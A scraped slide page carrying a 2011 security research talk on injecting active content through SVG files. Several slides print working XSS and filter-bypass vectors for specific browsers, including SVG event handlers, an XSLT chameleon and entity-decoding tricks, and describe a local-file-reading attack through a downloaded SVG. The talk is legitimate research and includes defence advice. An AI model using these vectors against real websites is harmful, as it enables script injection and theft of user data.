Java script Session No 1Java script Session No 1
Java script Session No 1
 
Html5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsHtml5 Canvas and Mobile Graphics
Html5 Canvas and Mobile Graphics
 

More from Mario Heiderich

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 

More from Mario Heiderich (9)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 

Recently uploaded

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 

Recently uploaded (20)

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 

The Image that called me - Active Content Injection with SVG Files

  • 1. The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
  • 2. Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr- University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
  • 3. Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
  • 4. SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
  • 5. SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
  • 6. Basic Example <svg xmlns=“http://www.w3.org/2000/svg“> <circle r=“40“ fill=“red“></circle> </svg>
  • 7. SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
  • 8. Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
  • 10. Scripting ● The following SVG executes JavaScript <svg xmlns=“http://www.w3.org/2000/svg“> <script> alert(1) </script> </svg> ● More examples?
  • 11. More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg">  <set attributeName="onmouseover" to="alert(1)"/>  </svg> <svg xmlns="http://www.w3.org/2000/svg">  <handler  xmlns:ev="http://www.w3.org/2001/xml­events"  ev:event="load" >alert(1)</handler> </svg>
  • 12. Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list- style/content/cursor ● In-line SVG
  • 13. Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
  • 14. XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
  • 15. Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely too be used in real life attacks! ● Porn sites, Email attachments, Malware
  • 16. In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
  • 17. Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
  • 18. Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
  • 19. Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
  • 20. Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
  • 21. More Opera ● SVG via favicon
  • 22. Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
  • 23. Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
  • 24. Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click- jacking ● SVG and XBL? You tell me!
  • 25. Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
  • 26. Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
  • 27. Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
  • 28. Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
  • 29. Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft